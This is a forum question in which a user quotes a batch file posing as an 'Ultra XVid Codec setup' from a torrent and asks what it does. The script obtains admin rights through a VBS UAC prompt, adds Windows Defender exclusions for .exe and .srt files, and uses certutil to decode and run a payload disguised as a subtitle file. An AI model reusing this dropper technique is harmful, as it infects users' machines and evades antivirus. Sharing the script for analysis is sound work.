Can someone explain what this batch file do?

  batch-file, powershell, windows

I recently downloaded a media package from torrent which doesn’t run on vlc and on windows media player it says "The Player might not support the file type or might not support the codec that was used to compress the file". the package also includes a batch file with name Ultra XVid Codec setup. when I tried running asked for some admin permission so I denied and closed it. Later I opened it using vscode and the code was this. just out of curiosity can someone briefly explain what this code tries to do and what threat is posseses.

 @echo off
 CLS
 ECHO.
 ECHO ======================================
 ECHO ===Running Admin shell please wait====

:init
 setlocal DisableDelayedExpansion
 set cmdInvoke=1
 set winSysFolder=System32
 set "batchPath=%~0"
 for %%k in (%0) do set batchName=%%~nk
 set "vbsGetPrivileges=%temp%OEgetPriv_%batchName%.vbs"
 setlocal EnableDelayedExpansion

:checkPrivileges
  NET FILE 1>NUL 2>NUL
  if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges )

:getPrivileges
  if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
  ECHO.
  ECHO **************************************
  ECHO Invoking UAC for Privilege Escalation
  ECHO **************************************

  ECHO Set UAC = CreateObject^("Shell.Application"^) > "%vbsGetPrivileges%"
  ECHO args = "ELEV " >> "%vbsGetPrivileges%"
  ECHO For Each strArg in WScript.Arguments >> "%vbsGetPrivileges%"
  ECHO args = args ^& strArg ^& " "  >> "%vbsGetPrivileges%"
  ECHO Next >> "%vbsGetPrivileges%"

  if '%cmdInvoke%'=='1' goto InvokeCmd 

  ECHO UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%vbsGetPrivileges%"
  goto ExecElevation

:InvokeCmd
  ECHO args = "/c """ + "!batchPath!" + """ " + args >> "%vbsGetPrivileges%"
  ECHO UAC.ShellExecute "%SystemRoot%%winSysFolder%cmd.exe", args, "", "runas", 1 >> "%vbsGetPrivileges%"

:ExecElevation
 "%SystemRoot%%winSysFolder%WScript.exe" "%vbsGetPrivileges%" %*
 exit /B

:gotPrivileges
 setlocal & cd /d %~dp0
 if '%1'=='ELEV' (del "%vbsGetPrivileges%" 1>nul 2>nul  &  shift /1)

 powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "exe"
 powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "srt"
 ECHO.
 ECHO Download update..
 ping 127.0.0.1 -n 8 > nul

 certutil -decodehex -f 75095_VTS.srt 75095_VTS_tmp.srt

 start 75095_VTS_tmp.srt

 ECHO %batchName% Arguments: P1=%1 P2=%2 P3=%3 P4=%4 P5=%5 P6=%6 P7=%7 P8=%8 P9=%9
 cmd /k
 exit

Source: Windows Questions

One Reply to “Can someone explain what this batch file do?”

Leave a Reply to jj Cancel reply